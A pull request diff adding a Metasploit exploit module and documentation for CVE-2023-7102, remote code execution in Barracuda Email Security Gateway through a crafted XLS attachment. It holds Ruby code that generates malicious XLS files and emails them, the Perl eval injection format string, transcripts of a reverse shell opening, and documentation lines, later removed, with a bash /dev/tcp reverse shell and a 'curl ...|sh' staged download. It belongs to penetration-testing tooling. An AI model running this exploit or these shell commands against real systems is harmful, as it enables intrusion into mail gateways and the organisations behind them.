### PR TITLE
Add Barracuda ESG Spreadsheet::ParseExcel RCE exploit (CVE-2023-7102)

### DIFF
--- a/documentation/modules/exploit/linux/smtp/barracuda_esg_spreadsheet_rce.md
+++ b/documentation/modules/exploit/linux/smtp/barracuda_esg_spreadsheet_rce.md
@@ -33,7 +33,7 @@ Most standard MSF payloads work out of the box, including `cmd/unix/reverse_perl
 
 1. `msfconsole`
 2. `use exploit/linux/smtp/barracuda_esg_spreadsheet_rce`
-3. `set RHOSTS <target_ip>`
+3. `set RHOST <target_ip>`
 4. `set MAILTO <valid_recipient@target_domain>`
 5. `set LHOST <attacker_ip>`
 6. `exploit`

--- a/documentation/modules/exploit/linux/smtp/barracuda_esg_spreadsheet_rce.md
+++ b/documentation/modules/exploit/linux/smtp/barracuda_esg_spreadsheet_rce.md
@@ -25,7 +25,7 @@ The module dynamically generates BIFF8 XLS files using Rex::OLE, supporting arbi
 | No `'` (single quote) | Breaks the Perl eval injection |
 | No null bytes | String terminator |
 
-Most standard MSF payloads work out of the box, including `cmd/unix/reverse_perl`.
+The default payload `cmd/unix/reverse_netcat` works cleanly within these constraints.
 
 ## Verification Steps
 
@@ -33,9 +33,9 @@ Most standard MSF payloads work out of the box, including `cmd/unix/reverse_perl
 
 1. `msfconsole`
 2. `use exploit/linux/smtp/barracuda_esg_spreadsheet_rce`
-3. `set RHOST <target_ip>`
+3. `set RHOST <ESG_IP>`
 4. `set MAILTO <valid_recipient@target_domain>`
-5. `set LHOST <attacker_ip>`
+5. `set LHOST <LHOST>`
 6. `exploit`
 
 Wait 30-90 seconds for Amavis to process the attachment.
@@ -62,51 +62,26 @@ XLS attachment filename. If not specified, generates a random filename like "Rep
 
 Tested against physical Barracuda ESG 300 appliance (firmware 8.0.1.001).
 
-### Barracuda ESG 300 (Firmware 8.0.1.001) - Reverse Perl Shell
+### Barracuda ESG 300 (Firmware 8.0.1.001) - Reverse Shell
 
 ```
 msf6 > use exploit/linux/smtp/barracuda_esg_spreadsheet_rce
-msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set RHOSTS 192.168.0.69
-msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set MAILTO admin@target.local
-msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set LHOST 192.168.0.42
+msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set RHOST <ESG_IP>
+msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set MAILTO <MAILTO>
+msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set LHOST <LHOST>
 msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > exploit
 
-[*] 192.168.0.69:25 - Running automatic check ("set AutoCheck false" to disable)
-[!] 192.168.0.69:25 - The service is running, but could not be validated. Barracuda ESG detected in SMTP banner
-[*] 192.168.0.69:25 - Generating malicious XLS with Perl payload in FORMAT record
-[*] 192.168.0.69:25 - Composing email with XLS attachment
-[*] 192.168.0.69:25 - Sending exploit email to admin@target.local via 192.168.0.69:25
-[+] 192.168.0.69:25 - Email sent successfully
-[*] 192.168.0.69:25 - Payload executes when Amavis scanner parses the XLS attachment (may take 30-90 seconds)
-[*] Command shell session 1 opened (192.168.0.42:4444 -> 192.168.0.69:36789)
+[*] <ESG_IP>:25 - Running automatic check ("set AutoCheck false" to disable)
+[!] <ESG_IP>:25 - The service is running, but could not be validated. Barracuda ESG detected in SMTP banner
+[*] <ESG_IP>:25 - Generating malicious XLS with payload in FORMAT record
+[*] <ESG_IP>:25 - Composing email with XLS attachment
+[*] <ESG_IP>:25 - Sending exploit email to <MAILTO> via <ESG_IP>:25
+[+] <ESG_IP>:25 - Email sent successfully
+[*] <ESG_IP>:25 - Payload executes when Amavis scanner parses the XLS attachment (may take 30-90 seconds)
+[*] Command shell session 1 opened (<LHOST>:4444 -> <ESG_IP>:XXXXX)
 
 id
-uid=110(scana) gid=1003(scana) groups=1003(scana)
-```
-
-### Staged Payload (Alternative)
-
-For payloads containing bad characters, use a staged approach:
-
-**Terminal 1 - Payload Server:**
-```bash
-echo 'bash -i >& /dev/tcp/192.168.0.42/4444 0>&1' > /tmp/a
-cd /tmp && python3 -m http.server 8080
-```
-
-**Terminal 2 - Listener:**
-```bash
-nc -lvnp 4444
-```
-
-**Terminal 3 - MSF Exploit:**
-```
-msf6 > use exploit/linux/smtp/barracuda_esg_spreadsheet_rce
-msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set RHOSTS 192.168.0.69
-msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set MAILTO admin@target.local
-msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set PAYLOAD cmd/unix/generic
-msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set CMD "curl 192.168.0.42:8080/a|sh"
-msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > exploit
+uid=604(scana) gid=604(scana) groups=604(scana)
 ```
 
 ## Technical Details
@@ -155,12 +130,6 @@ The module uses Rex::OLE to dynamically generate minimal BIFF8 XLS files. This a
 - Embeds the payload in a FORMAT record (opcode 0x041E)
 - Triggers payload via NUMBER cell referencing the custom format
 
-### Target Environment Notes
-
-- **Netcat variant:** Target uses OpenBSD netcat without `-e` flag. Use bash `/dev/tcp` or staged payloads instead.
-- **Amavis config:** Requires `$attachment_regex_defined = 1` in amavisd.conf for XLS processing.
-- **Execution user:** Code runs as `scana` user (mail scanning privileges).
-
 ## Troubleshooting
 
 ### Payload Contains Bad Characters
@@ -171,14 +140,14 @@ If you see "Payload contains ']'" or "Payload contains single quote" errors:
 
 ### No Callback Received
 
-1. Verify Amavis is processing attachments: `grep attachment_regex /home/emailswitch/code/config/amavisd.conf`
+1. Verify Amavis is processing attachments (check amavisd.conf for `$attachment_regex_defined`)
 2. Verify firewall allows outbound connections from target
 3. Check Amavis logs for processing errors
 4. Increase wait time - processing can take 30-90 seconds
 
 ### Binary Payloads Fail
 
-The `linux/x64/shell_reverse_tcp` and similar binary payloads may fail in the Amavis execution context. Use shell-based payloads like `cmd/unix/reverse_perl` instead.
+The `linux/x64/shell_reverse_tcp` and similar binary payloads may fail in the Amavis execution context. Use shell-based payloads like `cmd/unix/reverse_netcat` instead.
 
 ## References
 

--- a/documentation/modules/exploit/linux/smtp/barracuda_esg_spreadsheet_rce.md
+++ b/documentation/modules/exploit/linux/smtp/barracuda_esg_spreadsheet_rce.md
@@ -1,0 +1,189 @@
+## Vulnerable Application
+
+This module exploits CVE-2023-7102, an arbitrary code execution vulnerability in Barracuda Email Security Gateway (ESG) appliances. The vulnerability exists in how the Amavis scanner processes Excel attachments using the Perl Spreadsheet::ParseExcel library.
+
+The library's `Utility.pm` contains an unsafe `eval()` that processes Excel Number format strings without validation. By crafting a malicious XLS file with a specially formatted Number format string containing Perl code, an attacker can achieve remote code execution when the ESG scans the email attachment.
+
+### Affected Versions
+
+- Barracuda ESG firmware 5.1.3.001 through 9.2.1.001
+- Spreadsheet::ParseExcel versions <= 0.65
+
+### Background
+
+This vulnerability was exploited in the wild by UNC4841 (China-nexus threat actor) starting November 2023 as part of a campaign targeting government and technology organizations. Barracuda deployed automatic patches on December 21, 2023.
+
+CVE-2023-7101 refers to the underlying library vulnerability in Spreadsheet::ParseExcel, while CVE-2023-7102 refers to the Barracuda-specific exploitation vector through email attachment processing.
+
+## Payload Constraints
+
+The module dynamically generates BIFF8 XLS files using Rex::OLE, supporting arbitrary payload lengths. The only constraints are:
+
+| Constraint | Reason |
+|------------|--------|
+| No `]` character | Terminates the format string regex capture |
+| No `'` (single quote) | Breaks the Perl eval injection |
+| No null bytes | String terminator |
+
+Most standard MSF payloads work out of the box, including `cmd/unix/reverse_perl`.
+
+## Verification Steps
+
+### Exploitation (MSF Console)
+
+1. `msfconsole`
+2. `use exploit/linux/smtp/barracuda_esg_spreadsheet_rce`
+3. `set RHOSTS <target_ip>`
+4. `set MAILTO <valid_recipient@target_domain>`
+5. `set LHOST <attacker_ip>`
+6. `exploit`
+
+Wait 30-90 seconds for Amavis to process the attachment.
+
+## Options
+
+### MAILTO
+
+A valid email address on the target ESG appliance. The email will be sent to this address with the malicious XLS attachment.
+
+### MAILFROM
+
+The sender email address (default: scanner@example.com). Does not need to be valid.
+
+### SUBJECT
+
+Email subject line (default: "Q4 Financial Report"). Can be customized to improve social engineering.
+
+### FILENAME
+
+XLS attachment filename. If not specified, generates a random filename like "Report_XXXXXX.xls".
+
+## Scenarios
+
+Tested against physical Barracuda ESG 300 appliance (firmware 8.0.1.001).
+
+### Barracuda ESG 300 (Firmware 8.0.1.001) - Reverse Perl Shell
+
+```
+msf6 > use exploit/linux/smtp/barracuda_esg_spreadsheet_rce
+msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set RHOSTS 192.168.0.69
+msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set MAILTO admin@target.local
+msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set LHOST 192.168.0.42
+msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > exploit
+
+[*] 192.168.0.69:25 - Running automatic check ("set AutoCheck false" to disable)
+[!] 192.168.0.69:25 - The service is running, but could not be validated. Barracuda ESG detected in SMTP banner
+[*] 192.168.0.69:25 - Generating malicious XLS with Perl payload in FORMAT record
+[*] 192.168.0.69:25 - Composing email with XLS attachment
+[*] 192.168.0.69:25 - Sending exploit email to admin@target.local via 192.168.0.69:25
+[+] 192.168.0.69:25 - Email sent successfully
+[*] 192.168.0.69:25 - Payload executes when Amavis scanner parses the XLS attachment (may take 30-90 seconds)
+[*] Command shell session 1 opened (192.168.0.42:4444 -> 192.168.0.69:36789)
+
+id
+uid=110(scana) gid=1003(scana) groups=1003(scana)
+```
+
+### Staged Payload (Alternative)
+
+For payloads containing bad characters, use a staged approach:
+
+**Terminal 1 - Payload Server:**
+```bash
+echo 'bash -i >& /dev/tcp/192.168.0.42/4444 0>&1' > /tmp/a
+cd /tmp && python3 -m http.server 8080
+```
+
+**Terminal 2 - Listener:**
+```bash
+nc -lvnp 4444
+```
+
+**Terminal 3 - MSF Exploit:**
+```
+msf6 > use exploit/linux/smtp/barracuda_esg_spreadsheet_rce
+msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set RHOSTS 192.168.0.69
+msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set MAILTO admin@target.local
+msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set PAYLOAD cmd/unix/generic
+msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > set CMD "curl 192.168.0.42:8080/a|sh"
+msf6 exploit(linux/smtp/barracuda_esg_spreadsheet_rce) > exploit
+```
+
+## Technical Details
+
+### Vulnerability Root Cause
+
+The vulnerability exists in `Spreadsheet/ParseExcel/Utility.pm` at line 171:
+
+```perl
+if ($conditional) {
+    $section = eval "$number $conditional" ? 0 : 1;
+}
+```
+
+The `$conditional` variable is extracted from Excel Number format strings using a regex that captures content between `[<>=` and `]`:
+
+```perl
+if ( $format_str =~ /^\[([<>=][^\]]+)\](.*)$/ ) {
+    $conditional = $1;
+    $format_str  = $2;
+}
+```
+
+### Payload Construction
+
+The malicious format string is constructed as:
+
+```
+[>0;system('COMMAND')]0
+```
+
+When parsed, this becomes:
+
+```perl
+eval "123 >0;system('COMMAND')" ? 0 : 1;
+```
+
+The semicolon allows command chaining - the comparison evaluates first, then the `system()` call executes.
+
+### XLS Generation
+
+The module uses Rex::OLE to dynamically generate minimal BIFF8 XLS files. This approach:
+
+- Supports arbitrary payload lengths (no template size restrictions)
+- Creates properly structured OLE2 compound documents
+- Embeds the payload in a FORMAT record (opcode 0x041E)
+- Triggers payload via NUMBER cell referencing the custom format
+
+### Target Environment Notes
+
+- **Netcat variant:** Target uses OpenBSD netcat without `-e` flag. Use bash `/dev/tcp` or staged payloads instead.
+- **Amavis config:** Requires `$attachment_regex_defined = 1` in amavisd.conf for XLS processing.
+- **Execution user:** Code runs as `scana` user (mail scanning privileges).
+
+## Troubleshooting
+
+### Payload Contains Bad Characters
+
+If you see "Payload contains ']'" or "Payload contains single quote" errors:
+- Use `cmd/unix/generic` with a staged curl/wget command
+- Or use a different payload that avoids these characters
+
+### No Callback Received
+
+1. Verify Amavis is processing attachments: `grep attachment_regex /home/emailswitch/code/config/amavisd.conf`
+2. Verify firewall allows outbound connections from target
+3. Check Amavis logs for processing errors
+4. Increase wait time - processing can take 30-90 seconds
+
+### Binary Payloads Fail
+
+The `linux/x64/shell_reverse_tcp` and similar binary payloads may fail in the Amavis execution context. Use shell-based payloads like `cmd/unix/reverse_perl` instead.
+
+## References
+
+- https://nvd.nist.gov/vuln/detail/CVE-2023-7101
+- https://nvd.nist.gov/vuln/detail/CVE-2023-7102
+- https://github.com/haile01/perl_spreadsheet_excel_rce_poc
+- https://trust.barracuda.com/security/information/esg-vulnerability
+- https://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation

--- a/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
@@ -139,6 +139,9 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     datastore['MAILFROM'] = "#{Rex::Text.rand_text_alpha_lower(rand(5..10))}@#{Rex::Text.rand_text_alpha_lower(rand(4..8))}.com" if datastore['MAILFROM'].to_s.strip.empty?
+    datastore['SUBJECT'] = Rex::Text.rand_text_alpha(rand(8..16)) if datastore['SUBJECT'].to_s.strip.empty?
+    datastore['BODY'] = Rex::Text.rand_text_alpha(rand(16..32)) if datastore['BODY'].to_s.strip.empty?
+    datastore['FILENAME'] = "#{Rex::Text.rand_text_alpha(8)}.xls" if datastore['FILENAME'].to_s.strip.empty?
 
     print_status('Generating malicious XLS with payload in FORMAT record')
     xls_data = generate_malicious_xls(cmd)
@@ -443,19 +446,14 @@ class MetasploitModule < Msf::Exploit::Remote
   # Generate MIME email with XLS attachment
   #
   def generate_exploit_email(xls_data)
-    from = datastore['MAILFROM'].to_s.strip.empty? ? "#{Rex::Text.rand_text_alpha_lower(rand(5..10))}@#{Rex::Text.rand_text_alpha_lower(rand(4..8))}.com" : datastore['MAILFROM']
-    subject = datastore['SUBJECT'].to_s.strip.empty? ? Rex::Text.rand_text_alpha(rand(8..16)) : datastore['SUBJECT']
-    body_text = datastore['BODY'].to_s.strip.empty? ? Rex::Text.rand_text_alpha(rand(16..32)) : datastore['BODY']
-    filename = datastore['FILENAME'].to_s.strip.empty? ? "#{Rex::Text.rand_text_alpha(8)}.xls" : datastore['FILENAME']
-
     msg = Rex::MIME::Message.new
     msg.mime_defaults
-    msg.from = from
+    msg.from = datastore['MAILFROM']
     msg.to = datastore['MAILTO']
-    msg.subject = subject
+    msg.subject = datastore['SUBJECT']
 
-    msg.add_part(body_text, 'text/plain', nil, 'inline')
-    msg.add_part_attachment(xls_data, filename)
+    msg.add_part(datastore['BODY'], 'text/plain', nil, 'inline')
+    msg.add_part_attachment(xls_data, datastore['FILENAME'])
 
     msg.to_s
   end

--- a/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'rex/ole'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -140,7 +138,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::BadConfig, 'Payload contains single quote which breaks eval injection. Use a different payload.')
     end
 
-    print_status('Generating malicious XLS with Perl payload in FORMAT record')
+    print_status('Generating malicious XLS with payload in FORMAT record')
     xls_data = generate_malicious_xls(cmd)
 
     print_status('Composing email with XLS attachment')

--- a/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
@@ -210,8 +210,11 @@ class MetasploitModule < Msf::Exploit::Remote
     # Style record
     stream << biff_record(BIFF8_STYLE, style_data)
 
-    # Boundsheet - defines Sheet1 (offset fixed to 0, will be after workbook globals)
-    stream << biff_record(BIFF8_BOUNDSHEET, boundsheet_data(stream.length + 12)) # +12 for this record
+    # Boundsheet - worksheet BOF offset = current stream length + this record's size + EOF record size
+    # Pre-compute the BOUNDSHEET record size to calculate the correct absolute offset
+    boundsheet_size = biff_record(BIFF8_BOUNDSHEET, boundsheet_data(0)).bytesize
+    eof_size = biff_record(BIFF8_EOF, '').bytesize
+    stream << biff_record(BIFF8_BOUNDSHEET, boundsheet_data(stream.length + boundsheet_size + eof_size))
 
     # EOF
     stream << biff_record(BIFF8_EOF, '')

--- a/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
@@ -138,10 +138,15 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::BadConfig, 'Payload contains single quote which breaks eval injection. Use a different payload.')
     end
 
-    datastore['MAILFROM'] = "#{Rex::Text.rand_text_alpha_lower(rand(5..10))}@#{Rex::Text.rand_text_alpha_lower(rand(4..8))}.com" if datastore['MAILFROM'].to_s.strip.empty?
-    datastore['SUBJECT'] = Rex::Text.rand_text_alpha(rand(8..16)) if datastore['SUBJECT'].to_s.strip.empty?
-    datastore['BODY'] = Rex::Text.rand_text_alpha(rand(16..32)) if datastore['BODY'].to_s.strip.empty?
-    datastore['FILENAME'] = "#{Rex::Text.rand_text_alpha(8)}.xls" if datastore['FILENAME'].to_s.strip.empty?
+    @mailfrom = datastore['MAILFROM']
+    @subject = datastore['SUBJECT']
+    @body = datastore['BODY']
+    @filename = datastore['FILENAME']
+
+    @mailfrom = "#{Rex::Text.rand_text_alpha_lower(rand(5..10))}@#{Rex::Text.rand_text_alpha_lower(rand(4..8))}.com" if @mailfrom.to_s.strip.empty?
+    @subject = Rex::Text.rand_text_alpha(rand(8..16)) if @subject.to_s.strip.empty?
+    @body = Rex::Text.rand_text_alpha(rand(16..32)) if @body.to_s.strip.empty?
+    @filename = "#{Rex::Text.rand_text_alpha(8)}.xls" if @filename.to_s.strip.empty?
 
     print_status('Generating malicious XLS with payload in FORMAT record')
     xls_data = generate_malicious_xls(cmd)
@@ -448,12 +453,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def generate_exploit_email(xls_data)
     msg = Rex::MIME::Message.new
     msg.mime_defaults
-    msg.from = datastore['MAILFROM']
+    msg.from = @mailfrom
     msg.to = datastore['MAILTO']
-    msg.subject = datastore['SUBJECT']
+    msg.subject = @subject
 
-    msg.add_part(datastore['BODY'], 'text/plain', nil, 'inline')
-    msg.add_part_attachment(xls_data, datastore['FILENAME'])
+    msg.add_part(@body, 'text/plain', nil, 'inline')
+    msg.add_part_attachment(xls_data, @filename)
 
     msg.to_s
   end

--- a/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
@@ -138,12 +138,12 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::BadConfig, 'Payload contains single quote which breaks eval injection. Use a different payload.')
     end
 
-    @mailfrom = datastore['MAILFROM']
+    datastore['MAILFROM'] = "#{Rex::Text.rand_text_alpha_lower(rand(5..10))}@#{Rex::Text.rand_text_alpha_lower(rand(4..8))}.com" if datastore['MAILFROM'].to_s.strip.empty?
     @subject = datastore['SUBJECT']
     @body = datastore['BODY']
     @filename = datastore['FILENAME']
 
-    @mailfrom = "#{Rex::Text.rand_text_alpha_lower(rand(5..10))}@#{Rex::Text.rand_text_alpha_lower(rand(4..8))}.com" if @mailfrom.to_s.strip.empty?
+    @mailfrom = datastore['MAILFROM']
     @subject = Rex::Text.rand_text_alpha(rand(8..16)) if @subject.to_s.strip.empty?
     @body = Rex::Text.rand_text_alpha(rand(16..32)) if @body.to_s.strip.empty?
     @filename = "#{Rex::Text.rand_text_alpha(8)}.xls" if @filename.to_s.strip.empty?

--- a/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Unix Command',
             {
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_perl'
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
               }
             }
           ]

--- a/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
@@ -101,9 +101,9 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('MAILTO', [true, 'Target email address on the ESG']),
-        OptString.new('MAILFROM', [true, 'Sender email address', 'scanner@example.com']),
-        OptString.new('SUBJECT', [true, 'Email subject line', 'Q4 Financial Report']),
-        OptString.new('BODY', [false, 'Email body text']),
+        OptString.new('MAILFROM', [false, 'Sender email address (default: random)']),
+        OptString.new('SUBJECT', [false, 'Email subject line (default: random)']),
+        OptString.new('BODY', [false, 'Email body text (default: random)']),
         OptString.new('FILENAME', [false, 'XLS attachment filename (default: random)'])
       ]
     )
@@ -137,6 +137,8 @@ class MetasploitModule < Msf::Exploit::Remote
     if cmd.include?("'")
       fail_with(Failure::BadConfig, 'Payload contains single quote which breaks eval injection. Use a different payload.')
     end
+
+    datastore['MAILFROM'] = "#{Rex::Text.rand_text_alpha_lower(rand(5..10))}@#{Rex::Text.rand_text_alpha_lower(rand(4..8))}.com" if datastore['MAILFROM'].to_s.strip.empty?
 
     print_status('Generating malicious XLS with payload in FORMAT record')
     xls_data = generate_malicious_xls(cmd)
@@ -441,24 +443,18 @@ class MetasploitModule < Msf::Exploit::Remote
   # Generate MIME email with XLS attachment
   #
   def generate_exploit_email(xls_data)
+    from = datastore['MAILFROM'].to_s.strip.empty? ? "#{Rex::Text.rand_text_alpha_lower(rand(5..10))}@#{Rex::Text.rand_text_alpha_lower(rand(4..8))}.com" : datastore['MAILFROM']
+    subject = datastore['SUBJECT'].to_s.strip.empty? ? Rex::Text.rand_text_alpha(rand(8..16)) : datastore['SUBJECT']
+    body_text = datastore['BODY'].to_s.strip.empty? ? Rex::Text.rand_text_alpha(rand(16..32)) : datastore['BODY']
+    filename = datastore['FILENAME'].to_s.strip.empty? ? "#{Rex::Text.rand_text_alpha(8)}.xls" : datastore['FILENAME']
+
     msg = Rex::MIME::Message.new
     msg.mime_defaults
-    msg.from = datastore['MAILFROM']
+    msg.from = from
     msg.to = datastore['MAILTO']
-    msg.subject = datastore['SUBJECT']
+    msg.subject = subject
 
-    # Add text body
-    body_text = datastore['BODY'].to_s.strip
-    if body_text.empty?
-      body_text = "Please review the attached financial report.\n\nBest regards"
-    end
     msg.add_part(body_text, 'text/plain', nil, 'inline')
-
-    # Add XLS attachment
-    filename = datastore['FILENAME'].to_s.strip
-    if filename.empty?
-      filename = "Report_#{Rex::Text.rand_text_alpha(6)}.xls"
-    end
     msg.add_part_attachment(xls_data, filename)
 
     msg.to_s

--- a/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
@@ -109,8 +109,6 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('FILENAME', [false, 'XLS attachment filename (default: random)'])
       ]
     )
-
-    deregister_options('MAILTO_FROM')
   end
 
   def check

--- a/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
@@ -101,7 +101,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('MAILTO', [true, 'Target email address on the ESG']),
-        OptString.new('MAILFROM', [false, 'Sender email address (default: random)']),
         OptString.new('SUBJECT', [false, 'Email subject line (default: random)']),
         OptString.new('BODY', [false, 'Email body text (default: random)']),
         OptString.new('FILENAME', [false, 'XLS attachment filename (default: random)'])
@@ -138,7 +137,6 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::BadConfig, 'Payload contains single quote which breaks eval injection. Use a different payload.')
     end
 
-    datastore['MAILFROM'] = "#{Rex::Text.rand_text_alpha_lower(rand(5..10))}@#{Rex::Text.rand_text_alpha_lower(rand(4..8))}.com" if datastore['MAILFROM'].to_s.strip.empty?
     @subject = datastore['SUBJECT']
     @body = datastore['BODY']
     @filename = datastore['FILENAME']

--- a/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_spreadsheet_rce.rb
@@ -1,0 +1,467 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/ole'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::SMTPDeliver
+
+  # BIFF8 Record Opcodes
+  BIFF8_BOF = 0x0809  # Beginning of File
+  BIFF8_EOF = 0x000A  # End of File
+  BIFF8_CODEPAGE = 0x0042 # Code page
+  BIFF8_WINDOW1 = 0x003D # Window information
+  BIFF8_DATEMODE = 0x0022 # Date system
+  BIFF8_FONT = 0x0031 # Font definition
+  BIFF8_FORMAT = 0x041E # Number format string (payload injection point)
+  BIFF8_XF = 0x00E0 # Extended format
+  BIFF8_STYLE = 0x0293 # Style definition
+  BIFF8_BOUNDSHEET = 0x0085 # Sheet information
+  BIFF8_DIMENSION = 0x0200 # Sheet dimensions
+  BIFF8_ROW = 0x0208 # Row definition
+  BIFF8_NUMBER = 0x0203 # Floating point cell
+
+  # BIFF8 Constants
+  BIFF8_VERSION = 0x0600
+  BOF_WORKBOOK = 0x0005
+  BOF_WORKSHEET = 0x0010
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Barracuda ESG Spreadsheet::ParseExcel Arbitrary Code Execution',
+        'Description' => %q{
+          This module exploits CVE-2023-7102, an arbitrary code execution vulnerability
+          in Barracuda Email Security Gateway (ESG) appliances. The vulnerability exists
+          in how the Amavis scanner processes Excel attachments using the Perl
+          Spreadsheet::ParseExcel library.
+
+          The library's Utility.pm contains an unsafe eval() that processes Excel
+          Number format strings without validation. By crafting a malicious XLS file
+          with a specially formatted Number format string containing Perl code, an
+          attacker can achieve remote code execution when the ESG scans the email
+          attachment.
+
+          This module dynamically generates a minimal BIFF8 XLS file with the payload
+          embedded in a FORMAT record using Rex::OLE. Payload constraints: no ']' (terminates
+          format string) or single quotes (breaks Perl eval injection).
+
+          This vulnerability was exploited in the wild by UNC4841 (China-nexus threat
+          actor) starting November 2023. Barracuda deployed automatic patches on
+          December 21, 2023.
+
+          Affected versions: Barracuda ESG 5.1.3.001 through 9.2.1.001
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Mandiant',             # CVE-2023-7101/7102 discovery
+          'haile01',              # CVE-2023-7101 XLS payload technique
+          'Curt Hyvarinen'        # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-7102'],
+          ['CVE', '2023-7101'],
+          ['URL', 'https://github.com/haile01/perl_spreadsheet_excel_rce_poc'],
+          ['URL', 'https://trust.barracuda.com/security/information/esg-vulnerability'],
+          ['URL', 'https://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-7101']
+        ],
+        'DisclosureDate' => '2023-12-24',
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Privileged' => false, # Runs as scana user (Amavis scanner)
+        'Payload' => {
+          'Space' => 8192,
+          'DisableNops' => true,
+          'BadChars' => "]'\x00" # ] terminates format, ' breaks eval, null terminates
+        },
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_perl'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('MAILTO', [true, 'Target email address on the ESG']),
+        OptString.new('MAILFROM', [true, 'Sender email address', 'scanner@example.com']),
+        OptString.new('SUBJECT', [true, 'Email subject line', 'Q4 Financial Report']),
+        OptString.new('BODY', [false, 'Email body text']),
+        OptString.new('FILENAME', [false, 'XLS attachment filename (default: random)'])
+      ]
+    )
+
+    deregister_options('MAILTO_FROM')
+  end
+
+  def check
+    connect
+    banner_str = banner.to_s
+    if banner_str =~ /barracuda/i
+      return CheckCode::Detected('Barracuda ESG detected in SMTP banner')
+    end
+
+    if banner_str =~ /ESMTP/i
+      return CheckCode::Unknown('SMTP server detected, but cannot confirm Barracuda ESG')
+    end
+
+    CheckCode::Safe('No SMTP banner detected')
+  rescue Rex::ConnectionError => e
+    CheckCode::Unknown("Connection failed: #{e.message}")
+  ensure
+    disconnect
+  end
+
+  def exploit
+    cmd = payload.encoded
+
+    # Validate payload doesn't contain characters that break the injection
+    if cmd.include?(']')
+      fail_with(Failure::BadConfig, "Payload contains ']' which terminates the format string. Use a different payload.")
+    end
+    if cmd.include?("'")
+      fail_with(Failure::BadConfig, 'Payload contains single quote which breaks eval injection. Use a different payload.')
+    end
+
+    print_status('Generating malicious XLS with Perl payload in FORMAT record')
+    xls_data = generate_malicious_xls(cmd)
+
+    print_status('Composing email with XLS attachment')
